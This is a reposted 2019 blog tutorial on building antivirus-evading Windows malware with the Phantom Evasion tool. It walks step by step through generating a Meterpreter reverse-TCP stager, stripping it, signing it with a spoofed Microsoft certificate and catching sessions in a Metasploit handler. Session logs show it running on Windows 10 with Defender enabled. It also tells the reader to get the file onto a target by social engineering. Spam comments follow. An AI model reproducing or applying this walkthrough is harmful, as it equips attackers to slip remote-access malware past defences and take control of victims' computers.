Friday, 8 March 2019

BYPASS ANTIVIRUS DETECTION WITH PHANTOM PAYLOADS

phantom.png

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/03/04/bypass-antivirus-detection-with-phantom-payloads/

Metasploit is the most popular tool used in pentesting. Metasploit tries to find weakness across your local network before an attacker does. This is the most common tool used by attacker’s to test security of operating system. In Kali Linux metasploit comes pre-installed with lots of payloads which are used to generate malicious executable’s to hack different platforms. But today we will show you a tool called Phantom Evasion which is used to generate FUD (Fully Undetectable) executable’s with msfvenom payload. According to developer Phantom Evasion main aim is to bypass antivirus detection or we can say Antivirus Evasion.

  • Phantom Evasion has been tested on Kali Linux 2018.4 amd64).
  • For cloning type git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Type cd Phantom-Evasion
  • Type chmod u+x phantom-evasion.py
  • Type python3 phantom-evasion.py
  • When running first time it may encounter some error but the tool will work perfectly.
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1

    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Type 1
 
[>] Please insert option: 1
  • Type 2
 [+] WINDOWS MODULES INDEX:
 [1]  Shellcode Injection
 [2]  Stager
 [3]  Powershell / Wine-pyinstaller
 [0]  Back
 [>] Please insert option: 2
  • Type 1
 [+] WINDOWS STAGER MODULES:
 [1]  X86 stagers
 [2]  X64 stagers
 [0]  Back
 [>] Please insert option: 1
  • Type 3
 [+] WINDOWS x86 STAGER MODULES:
 [1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)
 [2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)
 [3]  C meterpreter/reverse_TCP HeapAlloc                              (C)
 [4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)
 [5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)
 [6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)
 [7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)
 [8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)
 [9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)
 [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)
 [11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)
 [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)
 [0]  Back
  • After selecting any payload it will display description of the payload & on what extension the payload will build.
[+] MODULE DESCRIPTION:
 This Module generate and compile
   32bit pure c meterpreter reverse tcp stagers.
   Require msfconsole multi/handler listener
   with payload set to windows/meterpreter/reverse_tcp
 [>] Memory allocation type: HEAP
 [>] TYPE: TCP
   [>] STATIC EVASION:
   Polymorphic source code
   [>] DYNAMIC EVASION:
   Resource consumption technique
   Sandbox-aware code
   [>] AUTOCOMPILE(cross platform): to EXE file
 Press Enter to continue:
  • Type 192.168.1.6 (Listen/ Attacker’s IP address)
[>] Please insert LHOST: 192.168.1.6
  • Type 443 (Listen/ Attacker’s Port)
[>] Please insert LPORT: 443
  • Then enter filename : file
[>] Please insert output filename: file
  • Type n to create only single process in target computer. So it become less chance to get caught by the antivirus.
[>] Spawn Multiple Processes:
 During target-side execution this will cause to spawn a maximum of 4 processes
 consequentialy.
 Only the last spawned process will reach the malicious section of code
 while the other decoy processes spawned before will executes only random junk code
 [>] Add multiple processes behaviour?(y/n): n
  • Type y
[>] Generating C meterpreter stager
 [>] Compiling…
 [>] Strip
 strip is a GNU utility to "strip" symbols from object files.
 This is useful for minimizing their file size, streamlining them for distribution.
 It can also be useful for making it more difficult to reverse-engineer the compiled code.
 (Lower rate of detection)
 [>] Strip executable? (y/n): y
  • The above query will minimize the malicious file size.
  • Type y
[>] Sign Executable
 Online Certificate spoofer & Executabe signer (Lower rate of detection)
 [>] Sign executable? (y/n): y
  • Above query will sign the malicious file with default certificate comes with phantom evasion.
  • You can use your own certificate or use it with Microsoft certificate which comes with phantom evasion.
  • Type y
  • Type 1
Certificates directory is not empty , use already existing certificate? (y/n): y
 [1] www.microsoft.com
 [2] Create new certificate
 [>] Select a Certificate or create a new one: 1
  • Type 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
 [>] Signing file1.exe with osslsigncode…
 [>] Succeeded
 [<>] File saved in Phantom-Evasion folder
  • After creating malicious code send the file to target. You can use any social engineering to trick your target.

TESTING WINDOWS PLATFORM :-

  • For testing we are using Windows 7 (32 Bit) with Windows Defender Disabled.
  • Open the executable file using by pressing enter.
  • For checking the payload. You can use metasploit multi handler which comes pre-installed in Kali Linux. Open another terminal & type msfconsole.
  • Type use multi/handler
msf > use multi/handler
  • Type LHOST 192.168.1.6 (same as you entered in phantom evasion).
  • Type LPORT 443 (same as you entered in phantom evasion).
  • Type show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
 LHOST => 192.168.1.6
 msf exploit(multi/handler) > set LPORT 443
 LPORT => 443
 msf exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
    LPORT     443              yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target
  • Type run
msf exploit(multi/handler) > run
  • As malicious is already started in Windows 7 Professional 32 Bit. After typing run a new session will be created between attacker & target machines.
  • Typesysinfo to check the target computer details.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
 meterpreter > sysinfo
 Computer        : WIN-31VSBP3FUQT
 OS              : Windows 7 (Build 7601, Service Pack 1).
 Architecture    : x86
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
  • Now you can manipulate the target using meterpreter command shell.
  • Now for further testing we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled.
  • Open the malicious exe in Windows 10 machine. As you open the exe a new session will be created in multi/ handler.
  • Type sysinfo to check the target computer details.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
 meterpreter > sysinfo
 Computer        : DESKTOP-I9LEAU8
 OS              : Windows 10 (Build 17758).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
  • Now you can manipulate the target using meterpreter command shell.

According to ethical hacking researcher of international institute of cyber security can be used to generate initial level payload which can be customize further to bypass other Antivirus.


2 comments:

  1. I am addicted to reading posts and I have read almost 50 blogs on this topic but I must say that this is something different. Every sentence is saying important

    information and is well-structured.Netflix Helpline Phone Number UK

    ReplyDelete
  2. Really appreciated! This post is written after good research on the topic and hence every single piece of information seems reliable. One can easily understand the topic because of simple words and sentences. How to install, activate, and update AVG Mobile Security?

    ReplyDelete